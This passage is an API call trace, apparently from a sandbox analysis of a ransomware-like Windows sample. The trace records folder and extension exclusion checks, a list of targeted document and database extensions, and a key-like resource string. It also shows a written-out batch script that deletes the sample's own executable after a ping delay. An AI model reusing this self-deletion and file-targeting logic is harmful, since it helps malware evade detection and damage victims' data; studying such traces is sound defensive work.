[0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0117.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0117.153] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0117.153] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0117.153] LockResource (hResData=0x516f58) returned 0x516f58 [0117.153] FreeResource (hResData=0x516f58) returned 0 [0117.153] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.153] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.153] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.153] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6350b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x6350b0, cbMultiByte=38, lpWideCharStr=0x62de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.153] FreeResource (hResData=0x50d64c) returned 0 [0117.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x6350b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] GetCurrentThreadId () returned 0xe60 [0117.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5c4258, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0117.153] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x5c4258, cbMultiByte=97, lpWideCharStr=0x592ebc, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0117.153] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0117.153] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0117.153] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0117.154] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0117.154] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0117.154] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.154] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x610df0, dwCreationFlags=0x4, lpThreadId=0x62dd84 | out: lpThreadId=0x62dd84*=0xe94) returned 0xb8 [0117.154] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0117.154] ResumeThread (hThread=0xb8) returned 0x1 [0117.154] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0117.497] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x30 [0117.497] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0117.497] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0117.497] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0117.497] LockResource (hResData=0x5187d4) returned 0x5187d4 [0117.497] FreeResource (hResData=0x5187d4) returned 0 [0117.497] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0117.497] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0117.497] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0117.497] LockResource (hResData=0x50d64c) returned 0x50d64c [0117.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0117.497] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x635120, cbMultiByte=38, lpWideCharStr=0x62df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0117.497] FreeResource (hResData=0x50d64c) returned 0 [0117.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0117.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x635124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0117.498] GetCurrentThreadId () returned 0xe60 [0117.498] GetCurrentThreadId () returned 0xe60 [0117.498] GetCurrentThreadId () returned 0xe60 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x62de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x62de48, cbMultiByte=83, lpWideCharStr=0x5c012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0117.498] GetTickCount () returned 0x27e05 [0117.498] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=17428689712) returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="W畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="l畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="L畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="s畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="o畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="r畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="5畔﮴\x12\x1c翻") returned 1 [0117.498] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="U畔﮴\x12\x1c翻") returned 1 [0117.498] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0117.498] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0117.498] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", lpszShortPath=0x5cc65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe") returned 0x30 [0117.498] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0117.498] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0117.498] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0117.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0117.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0117.499] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x5afbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0117.499] WriteFile (in: hFile=0xe8, lpBuffer=0x5afbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x5afbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0117.500] CloseHandle (hObject=0xe8) returned 1 [0117.501] GetCurrentThreadId () returned 0xe60 [0117.501] GetCurrentThreadId () returned 0xe60 [0117.501] GetCurrentThreadId () returned 0xe60 [0117.501] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xec8, dwThreadId=0xecc)) returned 1 [0117.508] CloseHandle (hObject=0xec) returned 1 [0117.508] CloseHandle (hObject=0xe8) returned 1 [0117.508] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] GetCurrentThreadId () returned 0xe60 [0117.508] 